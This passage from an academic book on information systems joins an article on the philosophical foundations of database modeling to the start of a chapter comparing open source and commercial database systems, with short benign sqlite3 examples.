Teleology comes from two ancient Greek words telos and logos. Telos means ultimate purpose and a logos is an explanation. So, teleology is a study of things in terms of their ultimate purposes. The use of teleological thinking is almost as old as the root words from which it is derived. Aristotle, who first introduced teleological thinking, believed that an adequate understanding of a phenomenon required an understanding of four causes: formal, material, efficient, and final (Gottlieb, 2002). The formal cause is the shape that a thing takes on.
A boat and a picnic table, for example, can be made out of the same material, but take on very different shapes. The material cause is the stuff out of which the thing is made. A boat may be made out of wood or steel. The efficient cause is the procedure by which the thing is made. A boat can be manufactured, constructed from lumber, or carved out of a log. The final cause is the ultimate purpose of the thing. The purpose of a boat is to float on water. It is easy to see that a ship builder who does not understand the final cause of a boat may not be very successful in building one. The final cause is ultimately a teleological explanation, which Aristotle required of all scientific explanations including those for inanimate or physical phenomena. This led to some problematic interpretations such as fire rises because it wishes to return to the sun, or objects fall because they wish to return to the center of the earth. This attribution of purpose to physical objects does not sit well with one’s modern sense and indeed Galileo dismissed teleological explanations from his view of astronomy, leading eventually to the modern view that physical objects simply follow the laws of nature and do not have any ultimate purpose (Losee, 1993). It is fairly easy and appropriate to dismiss teleology from physics, but that does not necessarily dismiss this perspective from all scientific and intellectual endeavors. For example, in biology, there is an ongoing debate regarding teleological explanations of biological systems. Can one fully understand the functioning of the kidney if one does not know that the purpose of the kidney is to remove waste materials from the bloodstream? It would seem that one could not. However, does that purpose exist in nature or does the observer ascribe that purpose in order to improve our understanding of the functioning of the kidney? Clearly, this debate can be easily distracted by the philosophical question of whether or not purposes exist in nature or if purposes are simply superimposed on nature in order to make things easier to understand. Most people would gladly accept
the second and lesser of these claims by saying that it does not matter if purposes exist in nature. Superimposing purposes on nature in order to make things easier to understand is a good enough justification for a teleological perspective. As we move from biological systems to human systems such as government or economic systems, teleological perspectives become increasingly more important. These systems evolved or were constructed to satisfy some sort of human need. To discuss them without discussing the purpose that they serve is to miss the point completely. One can easily dismiss teleological thinking from physics. In biology it becomes more difficult and in social science it is almost impossible to dismiss the teleological perspectives. Human systems must always be understood in terms of purposes or they are not understood at all. The most extreme example of teleological thinking is in the construction of artifacts such as an information system. The point here is that we should always understand the purpose for which we are building an information system or the purpose for which we are designing a database. If we do not understand the ultimate purpose of a thing we are designing, it is unlikely that we will design the right thing. Hence, all database design and information systems development should be teleological (Artz, 2001). This is not to say that it is. An alternative view is that we do not always know what we are doing when we build information systems, and that the act of building is a learning process (Checkland, 1989). However, one has to ask if it is better to build and validate an information system based on well-defined objectives, or if it is acceptable for an information system to be the by-product of a learning process whereby the developers know when they are finished what they should have done, an insight not reflected in the final product.
CORRESPONDENCE VS. COHERENCE VIEWS OF TRUTH

It is easiest to introduce this idea through an immediate example. Suppose a person believes the assertion that all trees have branches and leaves. Is this true? There are three levels at which we might consider this question. First, let us assume that the person believes this to be true because he or she heard it somewhere and has not seen any glaring challenges to this claim. We can call this level of truth naïve adaptation and say that the statement, while not being totally true, is true enough. If your criterion for truth is naïve adaptation, then true enough is good enough and something is true if you do not encounter any evidence to the contrary that you cannot easily dismiss or explain away. Suppose, next, that the person has a curious mind. He or she begins to examine this claim by checking with the physical world. The person notices that some trees have needles instead of leaves. He or she also notices that even trees with leaves often lose them in the winter. So the assertion that all trees have leaves does not correspond to what actually occurs in the real world. Hence, it is not true. This is the correspondence view of truth. The correspondence view of truth (Prior, 1967) asserts that in order for a thing to be true, it must correspond to a thing or event in the real world. So, instead of believing that all trees have leaves, this person may have to qualify the claim to say that all broadleaf trees have branches and leaves in the summer because that is what actually occurs in the world. Finally, let us say that this person has an orderly mind and realizes that the term tree is wantonly misused. For example, there are shoe trees and family trees that have nothing to do with the kind of tree about which he or she is thinking. The person sets out to define the concept of tree so that it includes all instances of what he or she believes are trees and no instances of things not believed to be trees. The person is now adhering
to the coherence view of truth. The coherence view of truth says that the world is a messy and chaotic place. In order for something to be true, it has to make sense. So this person makes the world coherent by creating, organizing, and making sense of categories and relationships. Trees, in the new orderly world, have a clear definition, and nobody will make the mistake of believing someone is actually a leaf on a family tree. So the coherence view of truth (White, 1967) suggests that truth is not something derived from the world, but rather it is an order superimposed on the world. All three of these views of truth can be seen as options in the database design process. How does the concept of truth apply to a database? The answer is quite simple. When one executes a query in a database and gets an answer, that answer should be the same as the answer they would get had they interrogated the real world. The point of a database, after all, is to model some aspect of the real world so that database users can interrogate their model of the world rather than having to interrogate the world each time. Kent (1978) gives recognition toward this idea: “An information system (e.g. database) is a model of a small, finite subset of the real world.…We expect certain correspondences between constructs inside the information system and in the real world” (p. 1). Now we can consider each level of truth with respect to databases. The naïve adaptation level of truth is a good model for many databases. The records in the database often reflect the way information is processed rather than the information itself. So the extent to which the records actually model the domain is, to some extent, coincidental. One can see this easily by selecting any record type in the database and asking the question, what set of entities in the real world does this set of records correspond to? If this question is difficult to answer, then the truth level of the database is naïve adaptation at best. However, as long as the information provided by the database is reasonably useful and satisfies the basic processing needs of
the organization, nobody is likely to complain. In order to meet the correspondence criterion, the question from the previous example must be expanded. Tables should correspond to classes of entities. Rows should correspond to specific occurrences of entities. Attribute values should be facts about specific entity occurrences. Foreign keys should correspond to regular relationships between entities in one class and entities in another class. The strength of correspondence is that when a user asks a question of the database, the answer he or she gets is not just a calculation in the database, but it is also true in the real world. Finally, the aspect of the real world that is being modeled may not be sufficiently refined to gain the full benefits of modeling it in a database. This occurs when the semantics of the domain are ambiguous. For example, in the university environment, the word course is often used both for a course and a course offering. This leads to problems in modeling the domain. Let us say that Professor Smith is teaching two sections of one course, and one section of another course. If you ask about the number of courses Professor Smith is teaching this semester, you cannot get a clear answer. The answer may be two if you actually mean course, but it could also be three if you mean course offerings. Often times, the semantics of a domain are too muddled to model directly, and in these cases we have to go beyond the correspondence criteria to the coherence criteria. That is, we have to use the database to superimpose order on the domain.
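The course versus course-offering ambiguity can be made concrete with a small sketch (Python with the standard-library sqlite3 module; the table and column names are invented for illustration). Once the two concepts are separated into two tables, both readings of the question have clear, and different, answers.

    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE course (course_id TEXT PRIMARY KEY, title TEXT)")
    conn.execute("""CREATE TABLE course_offering (
                        offering_id INTEGER PRIMARY KEY,
                        course_id   TEXT REFERENCES course(course_id),
                        section     TEXT,
                        instructor  TEXT)""")
    conn.executemany("INSERT INTO course VALUES (?, ?)",
                     [("DB101", "Databases"), ("IS200", "Information Modeling")])
    conn.executemany("INSERT INTO course_offering VALUES (?, ?, ?, ?)",
                     [(1, "DB101", "A", "Smith"), (2, "DB101", "B", "Smith"),
                      (3, "IS200", "A", "Smith")])

    # "How many courses is Professor Smith teaching?" now has two precise answers.
    courses = conn.execute("""SELECT COUNT(DISTINCT course_id)
                              FROM course_offering
                              WHERE instructor = 'Smith'""").fetchone()[0]
    offerings = conn.execute("""SELECT COUNT(*)
                                FROM course_offering
                                WHERE instructor = 'Smith'""").fetchone()[0]
    print(courses, offerings)   # 2 courses, 3 course offerings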
BRINGING IT ALL TOGETHER

The concepts just discussed, though well established in metaphysics, are intellectually distant from the practice of information modeling and, most likely, entirely foreign to most readers of this article. Hence, this section will provide a few bridges. A reasonable question to ask, at this point, is, how does one come to these particular concepts
as the philosophical foundations of information modeling? How do we know that there are not other philosophical concepts that might provide a better foundation? In order to answer this, we have to go back to the process of information modeling. When we design a database, we examine the application domain for the things of interest about which we would like to collect information. We call these things of interest entities. But it would not do to have a separate table for every entity. If we did, we would have Bob’s Table, Bill’s Table, Sarah’s Table, and so on for students. Beyond the obvious absurdity of having individual tables for entities, it would make it difficult to generalize our knowledge. That is, we could answer specific questions about Bob, Bill, or Sarah, but it would be difficult to answer general questions about the group containing these students. So instead of having tables for every entity, we group these entities into categories that we call entity types. Tables in a relational database represent entity types. This is a much more economical representation and allows us to extend our knowledge by characterizing the members of the entity type. For example, we put Bob, Bill, and Sarah into an entity type called Student and then we can determine the average age of our students, average grade point average, and so on. But as we make this transition from individual occurrences to grouping, we have to ask, where do these categories come from? Are they part of the real world waiting to be discovered or do we construct them to serve a particular need? If they are a part of the real world, how do we know when we have found them? If they are constructed, how do we know if we have constructed them correctly? The philosophical problem encountered when organizing the particulars of our experience into categories is called the problem of universals. It is exactly the same problem that database designers encounter when they attempt to construct an entity model of an application domain. Earlier work (Artz, 1999) shows that the philosophical assumptions revealed in some widely used texts
on information modeling are seriously conflicted, leading to a muddle of confusion with regard to the process of information modeling. A better understanding of the problem of universals from Plato to the present could provide some insight into this problem and possibly a resolution. Philosophical problems aside, when we create an entity type, we implicitly assume that the members of the entity type are all of the same kind. However, what do we mean by the same? If we look at the category called Students, we find that some are male and some are female. Some are young and others are older. Some are very bright. Others are less bright. How can people with so many differences be considered the same? The easy answer is that they are all the same because they are all students—but that begs the question. Ultimately, we group things because of a similarity of essence, and the concept of identity gives us insight into the notion of the similarity of essence. Any given group of people may share multiple similarities of essence. Given any group of people associated with a university, for example, we could divide them into Students and Professors, Younger People and Older People, Part-Time People and Full-Time People, people who are interested in technology and people who are interested in history, and so on. How do we know which characteristic is the most essential in forming the groupings? The answer is that it depends on what you are trying to represent with the model that you are constructing. More specifically, you need clearly articulated modeling objectives that will help guide you in determining the most essential characteristics. This in turn implies that you need to understand the purpose for which an information model is being constructed in order to construct it properly. From a philosophical perspective, we call this a teleological approach because it is driven by the final cause (as Aristotle would call it) or the purpose of the database. Finally, when we consider the various purposes for which we may construct a database, the pri-
mary purpose is always to provide information that will extend our knowledge about an application domain. A more subtle purpose is our intent with regard to refining the knowledge of that application domain. This is where the theories of truth come into play. If we adopt the naïve adaptation approach, we will attempt to model the semantics of the domain as they currently exist. This will make the database easier for users to accept, but the exploitability of the database will be limited. We tend not to use ordinary language to gain deeper insights into things. Francis Bacon (2000) called this phenomenon “idols of the marketplace.” In his landmark work on the philosophy of science “The New Organon,” Bacon says: Men associate through talk; and the words are chosen to suit the understanding of the common people. And thus a poor and unskillful code of words incredibly obstructs the understanding. …Plainly, words do violence to the understanding, and confuse everything; and betray men into countless empty disputes and fictions. (p. 42) Doubtless, Bacon would not accept the naïve adaptation view of database design. In search of greater exploitability, we may look more deeply into the semantics of the application domain, beyond the superficial conversational level of most users. We may look to categories of things of interest despite the different names that might be used by different people for those categories. In this case, we adopt the correspondence view of truth. That is, the entity classes in the database must correspond to foundation categories or concepts in the application domain. Those foundation categories may be quite different from the categories that people are used to talking about. It may also turn out that the application domain does not have foundation categories. That is, when you examine the usage of terms, you may find out that the common usages of the words in the application domain are too ambiguous to allow
effective database design. In this case, you may have to clean up the semantics in order to make the domain coherent and amenable to improvement through the development of a database.
IMPLICATIONS

The implications for the practice of information modeling are rather profound, but not nearly as profound as the implications for research in information modeling. Currently, the practice of information modeling begins as a naïve linguistic exercise in which the information modeler explores the application domain and attempts to come up with entity classes based on discussions with users and stakeholders within the application domain, reviews of existing systems, and perusal of various documents. Once the model is constructed, a user or stakeholder may quibble over how a particular entity class has been defined, but it is very unlikely that anyone will raise the question of whether or not it is the correct entity class. The design and development process continues until an information system is produced. This system is either accepted by the users, rejected by the users, or accepted conditionally pending future maintenance. However, there is nothing in the process currently to address the question of whether the correct information model was constructed. The teleological nature of information models expressed in this article suggests that in any given application domain, many information models are possible to serve many different purposes. Thus, the purpose for which an information model is being constructed must be clearly defined. In practical terms, this means that modeling objectives must be articulated. A model must be constructed to meet those articulated objectives, and the model may be validated based on the extent to which it meets those objectives. Research in information modeling is likely to change to accommodate these changes in practice. Currently, research in information modeling focuses on representation, documentation, and application generation. But, if the initial model is not correct, then how that model is represented and documented is of less importance. Any applications generated from an incorrect model cannot be correct. Instead, research needs to focus on how modeling objectives are derived and how models can be constructed to meet objectives. In addition, we need to better understand the process of validating models with respect to objectives. Even if modeling objectives are clearly articulated, there are still a host of philosophical, psychological, and sociological issues to contend with. This article has introduced some of the philosophical issues, but the treatments here have been necessarily superficial at best. So research in information modeling would turn away from the problem of representation and documentation and toward the problems of construction and validation.
LIMITATIONS

This study addresses the foundations of information modeling from a rational metaphysical perspective. It addresses philosophical issues pertaining to the economical representation of information for the purpose of exploitation. This is not the only philosophical perspective. An empirical approach might focus on a more faithful representation of reality with less concern for the utility of the representation for purposes of exploitation. We see more empirically oriented approaches in machine learning and computational induction. It would be interesting to compare the benefits and drawbacks of these two approaches, but that is well beyond the scope of this article. There are also social and psychological foundation issues. How does a social group come up with the set of categories that it uses in either its natural language or in a formal language used to represent general concepts? How does that process affect the intellectual exploitability of those concepts? Finally, there are numerous psychological issues that affect the construction of categories. These range from the psychology of concept formation to much more heuristic techniques in critical reasoning. All of these unaddressed areas are valuable, interesting, and may well contribute further to our understanding of information modeling. However, research must have its boundaries, and these other areas of investigation are well beyond the scope of this article.
CONCLUSION AND CAVEATS

One of the many purposes of philosophy is to integrate what we already know or understand with new knowledge that we discover. The past few decades have seen a dramatic increase in the amount of knowledge that we have discovered in information systems. However, it is difficult to know what to do with this knowledge as long as it is not integrated with other things that we know. The purpose of this article was to integrate some very fundamental concepts in metaphysics with the process of information modeling and thus provide the beginnings of a philosophical foundation for information modeling. It is important to remember that the ideas in this article are ideas from philosophy applied to information systems, not ideas from information systems reflected upon philosophically. Hence, readers who are deeply immersed in information systems with little exposure to philosophy might find some of the ideas strange or inconsistent with their current views of information systems. Those readers should reflect on the ideas in the article before rejecting them because they are different.
REFERENCES

Artz, J. (1997). A crash course in metaphysics for the database designer. Journal of Database Management, 8(4).
Artz, J. (1998). Information modeling and the problem of universals: A preliminary analysis of metaphysical assumptions. Proceedings of the Association for Information Systems 1998 Americas Conference. Artz, J. (1999). An analysis of ontological assumptions in information modeling. In M. KhosrowPour (Ed.), Managing information technology resources in organizations in the next millennium. Idea Group Publishing. Artz, J. (2001). A teleological approach to information systems development. In M. Khosrow-Pour (Ed.), Managing information technology in a global economy. Idea Group Publishing. Artz, J. (2006). Conflicting ontological assumptions in information modeling. In Encyclopedia of database technologies and applications. Information Science Publishing. Bacon, F. (2000). The new organon. In L. Jardine & M. Silverthorne (Eds.), Cambridge texts in the history of philosophy. Cambridge University Press. Benbasat, I., & Zmud, R. (2003). The identity crisis within the IS discipline: Defining and communicating the discipline’s core properties. MIS Quarterly, 27(2), 183-194. Burrell, G., & Morgan, G. (1979). Sociological paradigms and organizational analysis. London: Heinemann. Carr, N. (2003). IT doesn’t matter. HBR at Large, pp. 41-49. Checkland, P. B. (1989). Soft systems methodology. Human Systems Management, 8(4), 271-289. Codd, E. F. (1970). A relational model of data for large shared data banks. Communications of the ACM, 377-387. Culnan, M. (1986). The intellectual development of management information systems, 1972-1982:
A co-citation analysis. Management Science, 32(2), 156-172. Farhoomand, A., & Drury, D. (2001). Diversity and scientific progress in the information systems discipline. Communications of the AIS, 5(12). Gottlieb, A. (2002). The dream of reason. W. W. Norton & Company. Gray, P. (2003). Editorial: Introduction to the debate on the core of the information systems field. Communications of AIS, 12(42). Hirsch, E. (1982). The concept of identity. Oxford University Press. Hirsch, E. (1993). Dividing reality. Oxford University Press. Hirschheim, R., Klein, H., & Lyytinen, K. (1995). Information systems development and data modeling: Conceptual and philosophical foundations. Cambridge University Press.
Prior, A. N. (1967). Correspondence theory of truth. In P. Edwards (Ed.), Encyclopedia of philosophy (Vol. 1, pp. 223-232.). New York: Macmillan Publishing. Robey, D. (2003). Identity, legitimacy and the dominant research paradigm: An alternative prescription for the IS discipline. Journal of the Association for Information Systems, 4(7), 352-359. Roochnik, D. (2002). An introduction to Greek philosophy. The Teaching Company. Schoedinger, A. (Ed.). (1992). The problem of universals. Humanities Press. Stroll, A. (1967). Identity. In P. Edwards (Ed.), Encyclopedia of philosophy (Vol. 4, pp. 121-124). New York: Macmillan Publishing. Weber, R. (1987). Toward a theory of artifacts: A paradigmatic base for information systems research. Journal of Information Systems, 3-19.
Keen, P. (1980). MIS research: Reference disciplines and a cumulative tradition. Proceedings of the 1st International Conference on Information Systems, 9-18.
Weber, R. (2003). Still desperately seeking for the IT artifact (editor’s comments). MIS Quarterly, 27(2), iii-xi.
Kent, W. (1978). Data and reality: Basic assumptions in data processing reconsidered. North-Holland.
White, A. R. (1967). Coherence theory of truth. In P. Edwards (Ed.), Encyclopedia of philosophy (Vol. 1, pp. 130-133). New York: Macmillan Publishing.
Losee, J. (1993). A historical introduction to the philosophy of science. Oxford University Press. Orlikowski, W., & Iacono, C. (2001). Research commentary: Desperately seeking the “IT” in IT research: A call to theorizing the IT artifact. Information Systems Research, 12(2), 121-134.
Woozley, A. D. (1967). Universals. In P. Edwards (Ed.), Encyclopedia of philosophy (Vol. 7, pp. 194-206). New York: Macmillan Publishing.
This work was previously published in International Journal of Intelligent Information Technologies, Vol. 3, Issue 3, edited by V. Sugumaran, pp. 59-74, copyright 2007 by IGI Publishing, formerly known as Idea Group Publishing (an imprint of IGI Global).
Chapter 1.2
A Generalized Comparison of Open Source and Commercial Database Management Systems Theodoros Evdoridis University of the Aegean, Greece Theodoros Tzouramanis University of the Aegean, Greece
ABSTRACT

This chapter attempts to bring to light one of the less popular branches of the open source software family: the open source database management systems branch. In view of this objective, the background of these systems will first be briefly described, followed by the presentation of a fair generic database model. Subsequently, in order to present these systems under all their possible features, the main system representatives of both open source and commercial origins will be compared against this model and evaluated appropriately. By adopting such an approach, the chapter's initial concern is to ensure that the nature of database management systems in general can be apprehended. The overall orientation leads to an understanding that the gap between open and closed source database management systems has
been significantly narrowed, thus demystifying the respective commercial products.
INTRODUCTION

The issue of data storage, organization, protection, and distribution has grown in importance over the years. This is because data, in increasing quantities and from multiple origins, possibly serving different operational divisions, must be processed by companies and organizations if they are to remain viable and, beyond that, to flourish (Loney & Bryla, 2005). This chapter will initially examine the field of database software, pinpointing and briefly examining the most important representatives of both open source and commercial origins. Subsequently, a generalized structure of the database
model will be deployed and the most significant database system software will be evaluated according to the model’s component specifications. The chapter will conclude by presenting the results of the comparison along with our views on the future of open source database software.
BACKGROUND

The open source vs. closed source (alternatively called proprietary development) debate has been a topic of continuous quarrel between experts affiliated with either of the two camps. The notion of making money through traditional methods, such as the selling of individual copies, is incompatible with the open source philosophy. Some proprietary source advocates perceive open source software as damaging to the market of commercial software. However, this complaint is countered by a large number of alternative funding streams such as (Wikipedia.org, 2006a):
• Giving away the software for free and, in return, charging for installation and support, as in many Linux distributions
• Making the software available as open source so that people will be more likely to purchase a related product or service you do sell (e.g., OpenOffice.org vs. StarOffice)
• Cost avoidance/cost sharing: Many developers need a product, so it makes sense to share development costs (this is the genesis of the X-Window System and the Apache Web server).
Moreover, advocates of closed source argue that since no one is responsible for open source software, there is no incentive and no guarantee that a software product will be developed or that a bug in such a product will be fixed. At the same time, and in all circumstances, there is no specific
entity either of individual or organizational status to take responsibility for such negligence. However, studies about security in open source vs. closed source software (Winslow, 2004) claim not only that each significant commercial product has its counterpart in the open source arsenal, but also that flaws in open source software are usually discovered, and subsequently patched or fixed, more quickly. Besides, open source advocates argue that since the source code of closed source software is not available, there is no way to know what security vulnerabilities or bugs may exist. The database system software branch of the open source software family has been highly criticized, especially during the last 10 years. This is due to the fact that the early versions of such products included relatively few standard relational database management system (RDBMS) features. This has led some database experts, such as Chris Date (Wikipedia.org, 2006b), a database technology specialist who was involved in the technical planning of DB2, to criticize one of the major representatives of the field, MySQL, as falling short of being an RDBMS. Open source RDBMS advocates reply (BusinessWeek.com, 2006) that their products serve their purposes for the users, who are willing to accept some limitations (which are fewer with every major revision) in exchange for speed, simplicity, and rapid development. Developers and end-users alike have been using more and more open source database management systems (DBMSs). Such experimentation has laid the groundwork for open source DBMSs to follow in the footsteps of Apache and Linux, two open source products that have already penetrated the enterprise wall. Nonetheless, analysts Scott Lundstrom, Laura Carrillo, and David O'Brien are of the opinion that open source DBMSs are not going to get the boost from IBM and Oracle that Linux and Apache did (Informationweek.com, 2004), because they compete directly with the commercial database products published by these two companies.
Another group of experts (Wikipedia.org, 2006b) claims that another, perhaps simpler, explanation for the popularity of open source DBMSs is that they are often included as a default component in low-end commercial Web hosting plans alongside PHP or Perl.
MAIN THRUST OF THE CHAPTER

The Competitors
intelligence features such as data mining, OLAP, and in-line analysis. On January 30, 2006, IBM released a "community" edition of DB2 called DB2 Universal Database Express-C (IBM.com, 2006). This was an expected response to the recently announced free versions of Oracle 10g and Microsoft SQL Server. Express-C has no limit on the number of users or database size. It is deployable on machines with up to two processors and up to 4GB of memory. DB2 can be administered from either the command line or a graphical user interface (GUI).
DB2 Oracle DB2 is IBM’s family of information management software products. Most often, though, when people say DB2, they are referring to IBM’s flagship RDBMS, DB2 Universal Database (DB2 UDB). The software is available on many hardware and operating system platforms, ranging from mainframes and servers to workstations and even small hand-held devices. It runs on a variety of IBM and non-IBM operating systems. Besides the core database engine, the DB2 family consists of several other products that provide supplementary support to the DBMS’s functionality such as administration and replication tools, distributed data access, online analytical processing (OLAP) and many others. The origin of DB2 can be traced back to the System R project at the IBM’s Almaden Research Centre. The first official release took place in 1984 and was designed to operate on IBM’s mainframe platform (Silberschatz, Korth, & Sundarsham, 2002). DB2 is available in several editions, in other words, licensing arrangements. By opting for a reduced-feature edition, IBM allows customers to avoid paying for DBMS features which they do not need. Sample editions include the Workgroup, Workgroup Unlimited, and Enterprise Server Edition. A high-end edition is called DB2 UDB Data Warehouse Enterprise Edition, or DWE for short. This edition includes several business
Oracle Corporation founded in 1977 produces and markets the Oracle RDBMS, which many database applications use extensively on many popular computing platforms. Larry Ellison, Bob Miner, and Ed Oates—of Software Developer Laboratories (SDL)—developed the original Oracle DBMS software. They called their product Oracle after the code name of a CIA-funded project they had worked on while previously employed by Ampex Company. Their product was the first to reach the market, and, since then, has held a leading position in the relational database market (Silberschatz, Korth, & Sundarsham, 2002). In 2003, the Oracle Corporation released Oracle Database 10g. The g stands for grid, emphasizing a marketing thrust of presenting 10g as “grid computer ready.” As of June 2005, the Oracle Corporation has been supporting a wide array of operating systems including Windows and the majority of Unix-based operating systems. The Database distribution includes many built-in tools, including a Java-based utility (Figure 1) and a Web-based tool serving the same purpose. In addition, the company sells a set of added value add-on products (Loney & Bryla 2005)
that expand the DBMS capabilities, providing specialized tools such as query and analysis tools, data mining and sophisticated security tools, and so forth. The development of applications utilizing the Oracle RDBMS commonly takes place in Java, which is inherently supported by the database. Oracle Corporation has started a drive toward wizard-driven environments with a view to enabling non-programmers to produce simple data-driven applications. Oracle, as of January 2006, offers Database 10g Express Edition (Oracle Database XE), an entry-level, small-footprint database based on the Oracle Database 10g Release 2 code base that is free to develop, deploy, and distribute; is fast to download; and is simple to administer. Furthermore, Oracle's flagship, the Enterprise Edition, is also a free download, but its use is, as with the Express Edition, restricted to development and prototyping purposes. Commercial usage must be accompanied by an appropriate license from the Corporation. However, Oracle database software is considered to be one of the most expensive. As of January 2006, the list price for the Enterprise Edition is $40,000 per processor. Additional features and maintenance costs may add to the price substantially. As computers running Oracle often have eight or more processors, the software price can be in the hundreds of thousands of dollars. The total cost of ownership is much more, as Oracle databases usually require highly trained administrators to operate.

Figure 1. The Oracle Java-based administration console

SQL Server
Microsoft SQL Server is an RDBMS produced by Microsoft. It is commonly used by businesses for small- to medium-sized databases and, in the past five years, some large enterprise databases. The code base for Microsoft SQL Server (prior to version 7.0) originated in Sybase SQL Server and was Microsoft's entry to the enterprise-level database market, competing against Oracle and IBM. About the time the Windows NT operating system was coming out, Sybase and Microsoft parted ways and pursued their own design and marketing schemes. Several revisions have been done independently since, with improvements for the SQL Server. SQL Server 7.0 was the first true GUI-based DBMS server (Spenik & Sledge, 2002). The Microsoft SQL Server product is not just a DBMS; it also contains (as part of the product) an enterprise ETL tool (Integration Services), Reporting Server, OLAP, and messaging technologies, specifically Service Broker. Microsoft released the SQL Server Express product (Microsoft.com, 2006), which included all the core functionality of the SQL Server but places restrictions on the scale of databases. It will only utilize a single CPU and 1 GB of RAM, and it imposes a maximum size of 4 GB per database. SQL Express also does not include enterprise features such as Analysis Services, Data Transformation Services, and Notification Services. Microsoft's primary competition includes Oracle and DB2. The SQL Server, as of January 2006, has been ranked third in revenue share among these big three DBMS vendors. A significant drawback of the SQL Server is that it runs only on the Windows operating system.
Firebird

Firebird (sometimes called FirebirdSQL) is an RDBMS offering many ANSI SQL-99 and SQL-2003 features. It runs on Linux, Windows, and a variety of Unix platforms. Firebird was programmed and is maintained by the Firebird Foundation (formerly known as the FirebirdSQL Foundation). It was forked from the open sources of InterBase from Borland. Firebird's first release took place back in 1984 and, as of January 2006, the product has evolved into a very mature DBMS requiring minimal administration, providing advanced features, and offering a compliant database engine that implements most of the SQL-2003 standard (The Inquirer.net, 2005; Firebirdsql.org, 2006a). Firebird is expandable, utilizing specialized modules that are licensed under the Initial Public Developers License (IDPL). The original modules released by Inprise are licensed under the Interbase Public License. Both licenses are modified versions of the Mozilla Public License. In April 2003, Mozilla decided to rename their Web browser from Phoenix to Firebird. This decision caused concern within the Firebird DBMS project because of the assumption that a DBMS and a Web browser using the Firebird name would confuse users. The dispute continued until the Mozilla developers, in February 2004, renamed their product Firefox, thus clearing up the confusion (Wikipedia.org, 2006b).
MySQL

MySQL is considered the most popular open source RDBMS, with an estimated six million installations (BusinessWeek.com, 2006). Its first release took place unofficially in 1995. The Swedish company MySQL AB is responsible for MySQL, making the product available as free software under the GPL License. At the same time they also dually license it under traditional proprietary licensing arrangements for cases where the intended use is incompatible with the GPL (MySQL.com, 2005). A license of this type might, for example, be suitable for companies that do not want to release the source code of their MySQL-based application. The company MySQL AB also develops and maintains the system, selling support and service contracts as well as proprietary licensed copies of MySQL, and employing people all over the world who collaborate via the Internet. Among its strong points are its speed and ease of installation, and, as of January 2006, MySQL version 5 included for the first time many new enterprise-level features. MySQL is also highly popular for Web applications and acts as the DBMS component of the LAMP platform (Linux/Apache-MySQL-PHP/Perl/Python). Its popularity as a Web application is closely tied to the popularity of PHP, which is often combined with MySQL and nicknamed the Dynamic Duo. To administer MySQL one can use the included command-line tool and free downloadable separate GUI administration tools. One of them, MySQL Administrator, is depicted in Figure 2.

Figure 2. The MySQL Administration Console

MySQL works on many different platforms, including Windows, Linux, and UNIX-based op-
erating systems. MySQL features have attracted a set of distinguished customers including Yahoo!, CNET networks, Amazon, Cox Communications, and others. These firms have adopted MySQL as a reliable solution to support some of their internal operations.
PostgreSQL

PostgreSQL is a free object-relational database management system (ORDBMS) released under the flexible BSD License. It offers an alternative to other open source database systems as well as to commercial systems. Similar to other open source projects such as Apache and Linux, PostgreSQL is not controlled by any single company, but relies on a community of global developers and companies to develop it. PostgreSQL is based on POSTGRES Version 4.2, developed at the University of California, Berkeley, Computer Science Department. POSTGRES pioneered many concepts, such as functions, inheritance, and other object-oriented features that only became available in some commercial database systems much later. PostgreSQL is an open source descendant of this original Berkeley code. It supports a large part of the SQL standard and offers many advanced features. Furthermore, PostgreSQL supports a number of add-on modules and packages such as geographic objects, full text search, replication packages, and XML/XSLT support that greatly enhance the product's capabilities (PostgreSQL.com, 2005a). Moreover, PostgreSQL has provided the base for the development of EnterpriseDB (EDB). The latter is a most promising enterprise-class RDBMS compatible with Oracle, costing as a base product only a minor fraction, varying from 10% to 20%, of the price of a commercial system. On the down side, the product suffers from an image problem (The Inquirer.net, 2005). This is on account of the fact that PostgreSQL remains a project and there is no company accountable for offering respective services and support. Moreover, even though it is regarded by many as the most advanced open source DBMS, and despite commercial support by many smaller companies, it has a relatively small base of installations.
A Fair DBMS Model

As seen above, all the competitors have been on track for years and this justifies the popularity and recognition that these DBMSs enjoy. Some useful information regarding these systems is summarized in Table 1.
Table 1. Generic Information regarding DBMSs
Over the years, vendors kept improving their software by adding new features and increasing performance and stability (Fermi National Accelerator Laboratory, 2005). Unfortunately, this further obscures the situation, as no database software can prove to be better than the others. Taking into account marketing and software promotion, the situation becomes even more complicated as vendors attempt to prove the dominance of a product. In an attempt to resolve the issue, a five-component DBMS comparison model was conceived and used as a yardstick in order to produce fair, accurate, and valuable results, setting open source against commercial in the scientific field of database software. The model's architecture was influenced by all-time classic DBMS standards (Johnson, 1997) as well as by the requirements (BusinessWeek.com, 2006) that organizations of low to high population place on database software. The first component includes the fundamental features that modern database system software should provide. Among these are elementary data type support, SQL standard compliance, data constraint, index, and transaction protocol support. The second component is made up of advanced DBMS features such as special data types, stored procedures, triggers, cursors, sequences, user-defined data types, OLAP, and inherent support for object-oriented, spatial, and XML databases. The third component is related to database administration robustness and optimization. Evaluation on this component is based on the provision of appropriate access control, backup, and data migration mechanisms as well as the replication support and recovery capabilities of the software products. The fourth component consists of customizability criteria like scalability, reliability, and database performance according to data set size. The fifth component features DBMS support and acceptance. Software training, operation, administration, and maintenance manuals, as well as programming interfaces, external libraries, and product popularity around the world are considered to belong to this evaluation component. Following are comparisons and evaluations, mapping each of the model's components to a respective tier. The results of this appraisal are presented in the final part of the section.
The Comparison

Tier 1

All DBMSs perform, with respect to this particular component's standards, within very high levels (Devx.com, 2005). They fully support the latest, as of January 2006, SQL-2003 standard, and their transactions comply with the ACID protocol. MySQL could be taken as an exception, as both transactions and, as a result, ACID, along with referential integrity constraints, are supported on tables utilizing the InnoDB storage engine and not on the other available ones like MyISAM (PostgreSQL.org, 2005b). Additionally, MySQL, PostgreSQL, and Firebird support the 2-phase commit protocol to achieve concurrency control, while commercial systems offer more options. Furthermore, commercial DBMSs, along with PostgreSQL and MySQL, support savepoints during transactions. Finally, with respect to indexes, Oracle is known for the amount of tweaking it allows. The other systems support single-column, multi-column, unique, full-text, and primary-key indexes. The results from the comparison at the first tier are summarized in Table 2.
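As a brief illustration of the transaction and savepoint behaviour discussed above, the following sketch uses Python's standard-library sqlite3 module purely as a stand-in engine; the BEGIN/SAVEPOINT/ROLLBACK TO/COMMIT pattern shown here is broadly similar across the systems compared, although each product adds its own locking and isolation options.

    import sqlite3

    conn = sqlite3.connect(":memory:", isolation_level=None)  # manage transactions explicitly
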